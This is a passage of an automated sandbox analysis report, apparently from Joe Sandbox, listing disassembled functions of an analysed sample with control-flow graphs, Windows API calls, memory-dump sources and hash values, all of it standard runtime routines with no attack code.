                                                                                • Instruction ID: 584cf6986d97b9eb60d7654e3c6d7369c0f18d6de3872a3a944ee686c5a48c19
                                                                                • Opcode Fuzzy Hash: 239056730ff4087a25dfda539603b8cb7fedc83c5ed98b88d9718c298bb30b82
                                                                                • Instruction Fuzzy Hash: 1901A27264030176EE01B7B89E07BEA7A9D5F00B41F048528FA49590C3FFF09A008663
                                                                                Function 00AC46F6 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 108 ac46f6-ac470f 109 ac4725-ac472a 108->109 110 ac4711-ac4721 call abd466 108->110 112 ac472c-ac4736 109->112 113 ac4739-ac475f call ac53eb 109->113 110->109 117 ac4723 110->117 112->113 118 ac4765-ac4770 113->118 119 ac48d2-ac48e3 call ab5a66 113->119 117->109 120 ac48c5 118->120 121 ac4776-ac477b 118->121 125 ac48c7 120->125 123 ac477d-ac4786 call ab6000 121->123 124 ac4790-ac479b call ac3c5d 121->124 133 ac4788-ac478e 123->133 134 ac47a6-ac47aa 123->134 124->134 135 ac479d 124->135 129 ac48c9-ac48d0 call ab59cd 125->129 129->119 137 ac47a3 133->137 134->125 138 ac47b0-ac47c7 call ac53eb 134->138 135->137 137->134 138->125 141 ac47cd-ac47df call ac11b2 138->141 143 ac47e4-ac47e8 141->143 144 ac47ea-ac47f2 143->144 145 ac4803-ac4805 143->145 146 ac482c-ac4838 144->146 147 ac47f4-ac47f9 144->147 145->125 150 ac483a-ac483c 146->150 151 ac48b7 146->151 148 ac47ff-ac4801 147->148 149 ac48ab-ac48ad 147->149 148->145 153 ac480a-ac4824 call ac11b2 148->153 149->129 154 ac483e-ac4847 call ab6000 150->154 155 ac4851-ac485c call ac3c5d 150->155 152 ac48b9-ac48c0 call ab59cd 151->152 152->145 153->149 166 ac482a 153->166 154->152 164 ac4849-ac484f 154->164 155->152 165 ac485e 155->165 167 ac4864-ac4869 164->167 165->167 166->145 167->152 168 ac486b-ac4883 call ac11b2 167->168 168->152 171 ac4885-ac488c 168->171 172 ac488e-ac488f 171->172 173 ac48af-ac48b5 171->173 174 ac4890-ac48a2 call ac5467 172->174 173->174 174->152 177 ac48a4-ac48aa call ab59cd 174->177 177->149
                                                                                APIs
                                                                                • __alloca_probe_16.LIBCMT ref: 00AC477D
                                                                                • __alloca_probe_16.LIBCMT ref: 00AC483E
                                                                                • __freea.LIBCMT ref: 00AC48A5
                                                                                  • Part of subcall function 00AC3C5D: HeapAlloc.KERNEL32(00000000,00AC6376,?,?,00AC6376,00000220,?,00000000,?), ref: 00AC3C8F
                                                                                • __freea.LIBCMT ref: 00AC48BA
                                                                                • __freea.LIBCMT ref: 00AC48CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                • String ID:
                                                                                • API String ID: 1096550386-0
                                                                                • Opcode ID: 0f8e7f0574371b1d58e5c0a6d47e5c08221353feaa2234f0f8aa6948c94c2d57
                                                                                • Instruction ID: 7520e70f6b6f64ef8e93c8869f44a6aff0c2c108a6a1c3dd3e2866d2c7ca1b0b
                                                                                • Opcode Fuzzy Hash: 0f8e7f0574371b1d58e5c0a6d47e5c08221353feaa2234f0f8aa6948c94c2d57
                                                                                • Instruction Fuzzy Hash: B651C372A00246AFEF219FA4CD91FBB3AA9EF49750B16012DFD08E7241E771DC5087A4
                                                                                Function 00ABB0D5 Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 180 abb0d5-abb0e0 181 abb0e2-abb0f5 call abd381 call aba48f 180->181 182 abb0f6-abb109 call abb085 180->182 188 abb10b-abb128 CreateThread 182->188 189 abb137 182->189 191 abb12a-abb136 GetLastError call abd327 188->191 192 abb146-abb14b 188->192 193 abb139-abb145 call abaff7 189->193 191->189 194 abb14d-abb150 192->194 195 abb152-abb156 192->195 194->195 195->193
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(?,?,Function_0000AF79,00000000,?,?), ref: 00ABB11E
                                                                                • GetLastError.KERNEL32 ref: 00ABB12A
                                                                                • __dosmaperr.LIBCMT ref: 00ABB131
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorLastThread__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2744730728-0
                                                                                • Opcode ID: 59a3b4484616a1be96d7ee1fa84a86a4e79d8c5c23a34d0be26228876ba874f0
                                                                                • Instruction ID: 14e46c8e2264524a72ebaebd1c6398b00aa280ddab755d8a6a575a50ba980f10
                                                                                • Opcode Fuzzy Hash: 59a3b4484616a1be96d7ee1fa84a86a4e79d8c5c23a34d0be26228876ba874f0
                                                                                • Instruction Fuzzy Hash: EB018872510209ABDF15EFA4EC16AEE3BA9FF00360F000158B81196192EBB1CE40DBA1
                                                                                Function 00AB3295 Relevance: 4.5, APIs: 3, Instructions: 33threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 200 ab3295-ab32aa WaitForSingleObjectEx 201 ab32de-ab32e0 200->201 202 ab32ac-ab32b1 200->202 205 ab32e1-ab32e3 201->205 203 ab32c9-ab32dc FindCloseChangeNotification 202->203 204 ab32b3-ab32c2 GetExitCodeThread 202->204 203->205 204->201 206 ab32c4-ab32c7 204->206 206->203
                                                                                APIs
                                                                                • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000), ref: 00AB32A1
                                                                                • GetExitCodeThread.KERNEL32(?,?), ref: 00AB32BA
                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00AB32CC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ChangeCloseCodeExitFindNotificationObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 3816883391-0
                                                                                • Opcode ID: 2dadf3b87a64da04496a7492d9dcb559856c15543a8c20a6de190177c74e56e9
                                                                                • Instruction ID: beb6327e63be62a4b11675afc01a5fa779df509de8e107e85ee98ebc94241fc2
                                                                                • Opcode Fuzzy Hash: 2dadf3b87a64da04496a7492d9dcb559856c15543a8c20a6de190177c74e56e9
                                                                                • Instruction Fuzzy Hash: DEF05E32640118ABDF20CFA5DC06BD93A68EB11770F240710B925EA1E4D370DE529690
                                                                                Function 00ABB02E Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 207 abb02e-abb03b call ac06e1 210 abb07b-abb07e ExitThread 207->210 211 abb03d-abb045 207->211 211->210 212 abb047-abb04b 211->212 213 abb04d call ac127b 212->213 214 abb052-abb058 212->214 213->214 216 abb05a-abb05c 214->216 217 abb065-abb06b 214->217 216->217 218 abb05e-abb05f CloseHandle 216->218 217->210 219 abb06d-abb06f 217->219 218->217 219->210 220 abb071-abb075 FreeLibraryAndExitThread 219->220 220->210
                                                                                APIs
                                                                                  • Part of subcall function 00AC06E1: GetLastError.KERNEL32(00000000,?,00ABD386,00AC0ABD,?,?,00AC05DD,00000001,00000364,?,00000002,000000FF,?,00ABAF9E,00AD65C8,0000000C), ref: 00AC06E5
                                                                                  • Part of subcall function 00AC06E1: SetLastError.KERNEL32(00000000), ref: 00AC0787
                                                                                • CloseHandle.KERNEL32(?,?,?,00ABB165,?,?,00ABAFD7,00000000), ref: 00ABB05F
                                                                                • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00ABB165,?,?,00ABAFD7,00000000), ref: 00ABB075
                                                                                • ExitThread.KERNEL32 ref: 00ABB07E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                • String ID:
                                                                                • API String ID: 1991824761-0
                                                                                • Opcode ID: f0e33e0c67b6fd993695023fe92b5f3724078dee12838790fce71578fcec6350
                                                                                • Instruction ID: 2ab8b9a98d69bfa1f325afecb21fb8bcfc98b54b51efa7b4e8a1e4843851c0b8
                                                                                • Opcode Fuzzy Hash: f0e33e0c67b6fd993695023fe92b5f3724078dee12838790fce71578fcec6350
                                                                                • Instruction Fuzzy Hash: 66F05E30110604ABDB31AB76C848FBB7AAD6F00361B094A24F836C71B3DBA0DC42C6B0
                                                                                Function 00ABE30C Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000002,?,00ABE306,00ABB1B4,00ABB1B4,?,00000002,83CA0057,00ABB1B4,00000002), ref: 00ABE31D
                                                                                • TerminateProcess.KERNEL32(00000000,?,00ABE306,00ABB1B4,00ABB1B4,?,00000002,83CA0057,00ABB1B4,00000002), ref: 00ABE324
                                                                                • ExitProcess.KERNEL32 ref: 00ABE336
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                • Opcode ID: 8e2a07e260a662e9b38918440cd1bdd3200c32c09fb3bc24b5a0d5f76241b2f3
                                                                                • Instruction ID: 92e4b7aeae5769f66ee80c67b238068f496ab1d5168548521c3d46458b2f058e
                                                                                • Opcode Fuzzy Hash: 8e2a07e260a662e9b38918440cd1bdd3200c32c09fb3bc24b5a0d5f76241b2f3
                                                                                • Instruction Fuzzy Hash: 4BD06731040544ABCB01EFA1ED0D9D93F69AB443427454420BA054A022DB7299529B81
                                                                                Function 00AC30A7 Relevance: 3.2, APIs: 2, Instructions: 191fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 228 ac30a7-ac30c6 229 ac30cc-ac30ce 228->229 230 ac32a0 228->230 231 ac30fa-ac3120 229->231 232 ac30d0-ac30ef call aba412 229->232 233 ac32a2-ac32a6 230->233 235 ac3126-ac312c 231->235 236 ac3122-ac3124 231->236 239 ac30f2-ac30f5 232->239 235->232 238 ac312e-ac3138 235->238 236->235 236->238 240 ac3148-ac3153 call ac2c2b 238->240 241 ac313a-ac3145 call ac3b1a 238->241 239->233 246 ac3195-ac31a7 240->246 247 ac3155-ac315a 240->247 241->240 250 ac31f8-ac3218 WriteFile 246->250 251 ac31a9-ac31af 246->251 248 ac315c-ac3160 247->248 249 ac317f-ac3193 call ac27f1 247->249 252 ac3268-ac327a 248->252 253 ac3166-ac3175 call ac2bc3 248->253 270 ac3178-ac317a 249->270 255 ac321a-ac3220 GetLastError 250->255 256 ac3223 250->256 257 ac31e6-ac31f1 call ac2ca9 251->257 258 ac31b1-ac31b4 251->258 259 ac327c-ac3282 252->259 260 ac3284-ac3296 252->260 253->270 255->256 264 ac3226-ac3231 256->264 269 ac31f6 257->269 265 ac31d4-ac31e4 call ac2e6d 258->265 266 ac31b6-ac31b9 258->266 259->230 259->260 260->239 271 ac329b-ac329e 264->271 272 ac3233-ac3238 264->272 275 ac31cf-ac31d2 265->275 266->252 273 ac31bf-ac31ca call ac2d84 266->273 269->275 270->264 271->233 276 ac323a-ac323f 272->276 277 ac3266 272->277 273->275 275->270 279 ac3258-ac3261 call abd34a 276->279 280 ac3241-ac3253 276->280 277->252 279->239 280->239
                                                                                APIs
                                                                                  • Part of subcall function 00AC27F1: GetConsoleOutputCP.KERNEL32(83CA0057,00000000,00000000,00ABBB18), ref: 00AC2854
                                                                                • WriteFile.KERNEL32(FFAC3BE8,00000000,?,00ABBA38,00000000,00000000,00000000,00000000,00ABB181,?,00ABBA38,00ABB181,00000024,00AD6648,00000010,00ABBB18), ref: 00AC3210
                                                                                • GetLastError.KERNEL32(?,00ABBA38,00ABB181,00000024,00AD6648,00000010,00ABBB18,00ABB181,?,00000000,00000004), ref: 00AC321A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                                • String ID:
                                                                                • API String ID: 2915228174-0
                                                                                • Opcode ID: 783065a2bdd3e143be1f58beeeaacff97e832e21bfed2c1127f6180fef3a351c
                                                                                • Instruction ID: 6fa3ad4532657490739089355b06da98fd0240357b6f69c5f166cea33352d330
                                                                                • Opcode Fuzzy Hash: 783065a2bdd3e143be1f58beeeaacff97e832e21bfed2c1127f6180fef3a351c
                                                                                • Instruction Fuzzy Hash: 8A619472D04249AFDF11CFA8C845FEEBFB9AF19304F168149E804A7252D771DA05CB60
                                                                                Function 00AC6572 Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 283 ac6572-ac659a call ac60a2 286 ac65a0-ac65a6 283->286 287 ac6762-ac6763 call ac6113 283->287 289 ac65a9-ac65af 286->289 290 ac6768-ac676a 287->290 291 ac65b5-ac65c1 289->291 292 ac66b1-ac66d0 call ab7420 289->292 295 ac676b-ac6779 call ab5a66 290->295 291->289 293 ac65c3-ac65c9 291->293 301 ac66d3-ac66d8 292->301 296 ac65cf-ac65db IsValidCodePage 293->296 297 ac66a9-ac66ac 293->297 296->297 300 ac65e1-ac65e8 296->300 297->295 303 ac65ea-ac65f6 300->303 304 ac6610-ac661d GetCPInfo 300->304 305 ac66da-ac66df 301->305 306 ac6715-ac671f 301->306 307 ac65fa-ac6606 call ac6176 303->307 309 ac669d-ac66a3 304->309 310 ac661f-ac663e call ab7420 304->310 311 ac66e1-ac66e9 305->311 312 ac6712 305->312 306->301 308 ac6721-ac674b call ac6064 306->308 318 ac660b 307->318 323 ac674c-ac675b 308->323 309->287 309->297 310->307 324 ac6640-ac6647 310->324 316 ac670a-ac6710 311->316 317 ac66eb-ac66ee 311->317 312->306 316->305 316->312 321 ac66f0-ac66f6 317->321 318->290 321->316 322 ac66f8-ac6708 321->322 322->316 322->321 323->323 325 ac675d 323->325 326 ac6649-ac664e 324->326 327 ac6673-ac6676 324->327 325->287 326->327 329 ac6650-ac6658 326->329 328 ac667b-ac6682 327->328 328->328 330 ac6684-ac6698 call ac6064 328->330 331 ac665a-ac6661 329->331 332 ac666b-ac6671 329->332 330->307 334 ac6662-ac6669 331->334 332->326 332->327 334->332 334->334
                                                                                APIs
                                                                                  • Part of subcall function 00AC60A2: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00AC60CD
                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00AC63B9,?,00000000,?,00000000,?), ref: 00AC65D3
                                                                                • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00AC63B9,?,00000000,?,00000000,?), ref: 00AC6615
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CodeInfoPageValid
                                                                                • String ID:
                                                                                • API String ID: 546120528-0
                                                                                • Opcode ID: 4f47219e532e8e275f21b727f76a488eba79bf3c7a4250408523e9cdf9dd0244
                                                                                • Instruction ID: 205f5b7b3840482ad71980cbaff4955a5f5a123b4349a7f9a1bd8cc29d111734
                                                                                • Opcode Fuzzy Hash: 4f47219e532e8e275f21b727f76a488eba79bf3c7a4250408523e9cdf9dd0244
                                                                                • Instruction Fuzzy Hash: 8A515474A003059EDB24CF35C881FAABBF5EF85304F1A896ED0868B252E774D942CB90
                                                                                Function 00AB46A8 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 336 ab46a8-ab46c8 337 ab46ca-ab46d1 call ab468e 336->337 338 ab46d3-ab46da 336->338 347 ab4728-ab4736 call ab5a66 337->347 340 ab46fc-ab4700 338->340 341 ab46dc-ab46e6 338->341 342 ab4702-ab4711 call ab4133 340->342 343 ab4725 340->343 341->340 345 ab46e8-ab46fa 341->345 350 ab4739-ab476e 342->350 351 ab4713-ab4717 call ab34f5 342->351 343->347 345->347 358 ab4770-ab4773 350->358 359 ab4794-ab479c 350->359 354 ab471c-ab4720 351->354 354->343 356 ab4722 354->356 356->343 358->359 360 ab4775-ab4779 358->360 361 ab479e-ab47af call abc658 359->361 362 ab47b5-ab47bf 359->362 360->343 363 ab477b-ab478a call ab34f5 360->363 361->343 361->362 362->343 365 ab47c5-ab47c8 362->365 363->343 369 ab478c-ab4792 363->369 365->347 369->343
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Fputc
                                                                                • String ID:
                                                                                • API String ID: 3078413507-0
                                                                                • Opcode ID: 46ce93722b27fb6fac74b816a00c049a0df938880db08887d7f673c7beaf915f
                                                                                • Instruction ID: ae9752041be2026bf2caeb9521470b479c2d666e0a2e15b85958c0d33ed535cf
                                                                                • Opcode Fuzzy Hash: 46ce93722b27fb6fac74b816a00c049a0df938880db08887d7f673c7beaf915f
                                                                                • Instruction Fuzzy Hash: C2416E3690021AABCF14DF68D5809EDB7BCFF0E351B144156E441A7A42EF31ED95CB90
                                                                                Function 00AC2CA9 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 370 ac2ca9-ac2cfe call ab67d0 373 ac2d00 370->373 374 ac2d73-ac2d83 call ab5a66 370->374 376 ac2d06 373->376 377 ac2d0c-ac2d0e 376->377 379 ac2d28-ac2d4d WriteFile 377->379 380 ac2d10-ac2d15 377->380 383 ac2d4f-ac2d5a 379->383 384 ac2d6b-ac2d71 GetLastError 379->384 381 ac2d1e-ac2d26 380->381 382 ac2d17-ac2d1d 380->382 381->377 381->379 382->381 383->374 385 ac2d5c-ac2d67 383->385 384->374 385->376 386 ac2d69 385->386 386->374
                                                                                APIs
                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00ABBB18,?,00AC31F6,?,00000000,00000000,?,00000000,00000000), ref: 00AC2D45
                                                                                • GetLastError.KERNEL32(?,00AC31F6,?,00000000,00000000,?,00000000,00000000,00000000,00ABB181,?,00ABBA38,00ABB181,00000024,00AD6648,00000010), ref: 00AC2D6B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID:
                                                                                • API String ID: 442123175-0
                                                                                • Opcode ID: 6aeed32510658ac4f4ecf6b47b4bfcd57a6e7d36cf496df3a249d480f5c248fb
                                                                                • Instruction ID: 33e4d166a252d2c16d2ca65737ef811c8455d6d9f91b41627ff4b9dd5c3bd6df
                                                                                • Opcode Fuzzy Hash: 6aeed32510658ac4f4ecf6b47b4bfcd57a6e7d36cf496df3a249d480f5c248fb
                                                                                • Instruction Fuzzy Hash: AF218034A002199BCB16CF29DC80BD9B7B9EB59305F1541ADE906E7251D630DE82CBA4
                                                                                Function 00AC1851 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 387 ac1851-ac1856 388 ac1858-ac1870 387->388 389 ac187e-ac1887 388->389 390 ac1872-ac1876 388->390 392 ac1899 389->392 393 ac1889-ac188c 389->393 390->389 391 ac1878-ac187c 390->391 395 ac18f3-ac18f7 391->395 394 ac189b-ac18a8 GetStdHandle 392->394 396 ac188e-ac1893 393->396 397 ac1895-ac1897 393->397 398 ac18aa-ac18ac 394->398 399 ac18d5-ac18e7 394->399 395->388 400 ac18fd-ac1900 395->400 396->394 397->394 398->399 401 ac18ae-ac18b7 GetFileType 398->401 399->395 402 ac18e9-ac18ec 399->402 401->399 403 ac18b9-ac18c2 401->403 402->395 404 ac18ca-ac18cd 403->404 405 ac18c4-ac18c8 403->405 404->395 406 ac18cf-ac18d3 404->406 405->395 406->395
                                                                                APIs
                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 00AC189D
                                                                                • GetFileType.KERNELBASE(00000000), ref: 00AC18AF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileHandleType
                                                                                • String ID:
                                                                                • API String ID: 3000768030-0
                                                                                • Opcode ID: 13cf289cf0071c74c23d3d10656139625c52f31375a58635d629cbf684baee93
                                                                                • Instruction ID: 448f5e460c179017db2bc44108042b2553db6994b370d459d9d36845fb5f32bd
                                                                                • Opcode Fuzzy Hash: 13cf289cf0071c74c23d3d10656139625c52f31375a58635d629cbf684baee93
                                                                                • Instruction Fuzzy Hash: 4011727170C75186C7348B7E8C88F226AA4A757330B3A0B1EE5B6865F3D634D986D391
                                                                                Function 00ABAF79 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetLastError.KERNEL32(00AD65C8,0000000C), ref: 00ABAF8C
                                                                                • ExitThread.KERNEL32 ref: 00ABAF93
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
